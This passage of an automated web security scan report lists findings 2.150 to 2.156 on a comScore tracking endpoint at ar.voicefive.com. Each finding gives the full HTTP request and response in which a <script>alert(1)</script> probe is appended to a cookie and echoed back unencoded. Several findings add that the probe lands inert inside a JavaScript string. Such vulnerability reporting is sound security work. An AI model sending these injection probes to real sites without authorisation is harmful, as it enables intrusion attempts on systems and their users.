2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&afe4a<script>alert(1)</script>2a7bdbc50e5', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 62218<script>alert(1)</script>c76aa499034 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&62218<script>alert(1)</script>c76aa499034; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&62218<script>alert(1)</script>c76aa499034', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851"
...[SNIP]...

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the response body inside a single-quoted JavaScript string literal, in an object literal that maps cookie names to their values, and the response is served as application/x-javascript; the scanner's description of this context as HTML text between tags does not match the response shown below. The payload e561b<script>alert(1)</script>97681a38a8f was submitted in the ar_p90452457 cookie and was echoed unmodified.

Because the reflection point is a JavaScript string literal rather than HTML, the <script> markup in this payload is inert where it lands. The proof of concept establishes that the cookie value reaches the response without encoding; whether script can actually be injected here depends on whether a single quote, backslash or line terminator survives unescaped, which this payload does not test.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&e561b<script>alert(1)</script>97681a38a8f; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
739&arc=40422016&', "BMX_G": 'method->-1,ts->1304954985', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&e561b<script>alert(1)</script>97681a38a8f', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the response body inside a single-quoted JavaScript string literal, in an object literal that maps cookie names to their values, and the response is served as application/x-javascript; the scanner's description of this context as HTML text between tags does not match the response shown below. The payload 1f282<script>alert(1)</script>608567be610 was submitted in the ar_p91136705 cookie and was echoed unmodified.

Because the reflection point is a JavaScript string literal rather than HTML, the <script> markup in this payload is inert where it lands. The proof of concept establishes that the cookie value reaches the response without encoding; whether script can actually be injected here depends on whether a single quote, backslash or line terminator survives unescaped, which this payload does not test.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&1f282<script>alert(1)</script>608567be610; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&1f282<script>alert(1)</script>608567be610', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&rec
...[SNIP]...

2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the response body inside a single-quoted JavaScript string literal, in an object literal that maps cookie names to their values, and the response is served as application/x-javascript; the scanner's description of this context as HTML text between tags does not match the response shown below. The payload 3242f<script>alert(1)</script>964b49411c1 was submitted in the ar_p91300630 cookie and was echoed unmodified.

Because the reflection point is a JavaScript string literal rather than HTML, the <script> markup in this payload is inert where it lands. The proof of concept establishes that the cookie value reaches the response without encoding; whether script can actually be injected here depends on whether a single quote, backslash or line terminator survives unescaped, which this payload does not test.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&3242f<script>alert(1)</script>964b49411c1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&3242f<script>alert(1)</script>964b49411c1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the response body inside a single-quoted JavaScript string literal, in an object literal that maps cookie names to their values, and the response is served as application/x-javascript; the scanner's description of this context as HTML text between tags does not match the response shown below. The payload 6cd03<script>alert(1)</script>1bad017a894 was submitted in the ar_p92429851 cookie and was echoed unmodified.

Because the reflection point is a JavaScript string literal rather than HTML, the <script> markup in this payload is inert where it lands. The proof of concept establishes that the cookie value reaches the response without encoding; whether script can actually be injected here depends on whether a single quote, backslash or line terminator survives unescaped, which this payload does not test.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&6cd03<script>alert(1)</script>1bad017a894; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
1&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&6cd03<script>alert(1)</script>1bad017a894', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the response body inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object literal, and the response is served as application/x-javascript; the scanner's description of this context as HTML text between tags does not match the response shown below. The payload 601d2<script>alert(1)</script>02d3d14ba53 was submitted in the ar_p97174789 cookie and was echoed unmodified.

Because the reflection point is a JavaScript string literal rather than HTML, the <script> markup in this payload is inert where it lands. The proof of concept establishes that the cookie value reaches the response without encoding; whether script can actually be injected here depends on whether a single quote, backslash or line terminator survives unescaped, which this payload does not test. The response to this request also shows the server re-serialising the parsed cookie: the Set-Cookie header for ar_p97174789 contains 601d2<script>alert(1)</script>02d3d14ba53= as an empty-valued key, so the server splits the cookie into name=value pairs, writes them back out, and returns the injected text to the browser's cookie jar rather than discarding it.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&601d2<script>alert(1)</script>02d3d14ba53; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&601d2<script>alert(1)</script>02d3d14ba53=&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&601d2<script>alert(1)</script>02d3d14ba53', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->
...[SNIP]...

2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the response body inside a single-quoted JavaScript string literal, in an object literal that maps cookie names to their values, and the response is served as application/x-javascript; the scanner's description of this context as HTML text between tags does not match the response shown below. The payload 4341e<script>alert(1)</script>faac9635f42 was appended to the cookie's existing value of 1 and was echoed unmodified, so the reflected literal reads '14341e<script>alert(1)</script>faac9635f42'.

Because the reflection point is a JavaScript string literal rather than HTML, the <script> markup in this payload is inert where it lands. The proof of concept establishes that the cookie value reaches the response without encoding; whether script can actually be injected here depends on whether a single quote, backslash or line terminator survives unescaped, which this payload does not test.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
